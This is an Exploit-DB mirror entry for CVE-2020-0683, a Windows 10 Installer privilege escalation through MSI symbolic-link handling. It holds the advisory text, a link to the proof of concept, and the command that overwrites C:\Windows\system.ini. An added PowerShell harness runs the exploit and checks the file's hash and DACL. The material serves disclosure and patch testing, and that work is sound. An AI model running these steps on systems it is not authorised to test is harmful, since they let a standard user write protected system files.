exploit-db-mirror/exploits/windows/local/48079.txt
Offensive Security 228a37da9c DB: 2020-02-18
# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
# Author: nu11secur1ty
# Date: 2020-02-14
# Vendor: Microsoft
# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
# CVE: CVE-2020-0683
[+] Credits: Ventsislav Varbanovski (@nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: readme from GitHub
[+] twitter.com/nu11secur1ty
[Exploit Program]
Link:
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
[Vendor]
Microsoft
[Vulnerability Type]
Windows Installer Elevation of Privilege Vulnerability
[CVE Reference]
An elevation of privilege vulnerability exists in the Windows Installer
when MSI packages process symbolic links. An attacker who successfully
exploited this vulnerability could bypass access restrictions to add or
remove files.
To exploit this vulnerability, an attacker would first have to log on to
the system. An attacker could then run a specially crafted application that
could exploit the vulnerability and add or remove files.
The security update addresses the vulnerability by modifying how reparse
points are handled by the Windows Installer.
[Security Issue]
Elevation of privilege: a standard user gains write access to files under
C:\Windows that only administrators should be able to modify (the test
below overwrites c:\Windows\system.ini).
[References]
# CVE-2020-0683
Original PoC sent to MSRC.
Assigned CVE-2020-0683 - Windows Installer Elevation of Privilege
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683
The source code builds with Visual Studio C++ 2019.
The compiled exploit (exe) to execute is inside the "nu11secur1ty" directory.
# Note:
This test targets `system.ini` at c:\Windows\system.ini.
Because the exploit overwrites this file, restore the original `system.ini`
after the test; a copy is provided in the CVE-2020-0683 directory.
--------------------------------------------------------------------------
- - How to run the exploit
Go into the "nu11secur1ty" directory and from a cmd console launch:
- for the test
MsiExploit.exe c:\Windows\system.ini
Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory.
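As an added example (not part of this advisory or of the nu11secur1ty repository), the test above wrapped in a PowerShell harness: it checks that MsiExploit.exe and foo.msi sit together, backs up and hashes the target, runs the exploit exactly as documented, then compares the hash and DACL afterwards and prints the restore command. The exploit directory layout ($ExploitDir), the backup-file name and the exit-code reporting are assumptions of this harness; the exploit's argument and the target file are the ones given above.

```powershell
<#
  Added example harness for the CVE-2020-0683 test described in the advisory.
  Not the author's code. Assumptions: MsiExploit.exe and foo.msi live in
  $ExploitDir; the backup is written next to them as <target>.bak.
#>
param(
    # Directory holding MsiExploit.exe and foo.msi (the advisory requires both together).
    [string]$ExploitDir = (Join-Path $PWD 'nu11secur1ty'),
    # File the test overwrites; the advisory uses c:\Windows\system.ini.
    [string]$Target     = 'C:\Windows\system.ini'
)

$ErrorActionPreference = 'Stop'

# 1. Prerequisite from the advisory: both files must be in the same directory.
foreach ($name in 'MsiExploit.exe', 'foo.msi') {
    if (-not (Test-Path -LiteralPath (Join-Path $ExploitDir $name))) {
        throw "Missing $name in $ExploitDir"
    }
}

# 2. An elevation-of-privilege test only proves something from a standard-user
#    shell; warn if this PowerShell is already elevated.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if ($principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Write-Warning 'Running elevated: a successful write proves nothing about EoP.'
}

# 3. Back up the target (world-readable, so a standard user can copy it) and
#    record its SHA-256 hash and DACL before the test.
$backup = Join-Path $ExploitDir ('{0}.bak' -f (Split-Path $Target -Leaf))  # assumed name
Copy-Item -LiteralPath $Target -Destination $backup -Force
$hashBefore = (Get-FileHash -LiteralPath $Target -Algorithm SHA256).Hash
$aclBefore  = (Get-Acl -LiteralPath $Target).AccessToString
"Before: SHA256 $hashBefore"

# 4. Run the test as the advisory does: MsiExploit.exe <target>, from the
#    directory that also contains foo.msi.
$proc = Start-Process -FilePath (Join-Path $ExploitDir 'MsiExploit.exe') `
                      -ArgumentList ('"{0}"' -f $Target) `
                      -WorkingDirectory $ExploitDir -Wait -PassThru -NoNewWindow
"MsiExploit.exe exit code: $($proc.ExitCode)"

# 5. Compare. A changed hash from a standard-user shell means the Installer let
#    an unprivileged caller write into C:\Windows, i.e. the host is unpatched.
#    A changed DACL with an unchanged hash is also reported, since the advisory
#    describes the impact as bypassing access restrictions on files.
$hashAfter = (Get-FileHash -LiteralPath $Target -Algorithm SHA256).Hash
$aclAfter  = (Get-Acl -LiteralPath $Target).AccessToString
"After:  SHA256 $hashAfter"
if ($hashAfter -ne $hashBefore) {
    Write-Host 'Target content modified: host appears vulnerable to CVE-2020-0683.' -ForegroundColor Red
} elseif ($aclAfter -ne $aclBefore) {
    Write-Host 'Target content unchanged but its DACL changed; inspect with Get-Acl.' -ForegroundColor Yellow
} else {
    Write-Host 'Target unchanged: write blocked (patched, or the exploit did not run).' -ForegroundColor Green
}

# 6. Restore step. Writing back into C:\Windows needs an elevated shell, so the
#    command is printed rather than executed here.
"Restore from an elevated prompt:`n  Copy-Item -LiteralPath '$backup' -Destination '$Target' -Force"
```

Run it from a non-elevated PowerShell as a standard user. On a host carrying the fix from the MSRC advisory linked above the expected result is an unchanged hash; whatever the outcome, restore `system.ini` from an elevated prompt as the note above says.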
- @nu11secur1ty
[Network Access]
Local
[Disclosure Timeline]
02/11/2020
[Disclaimer]
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
nu11secur1ty
--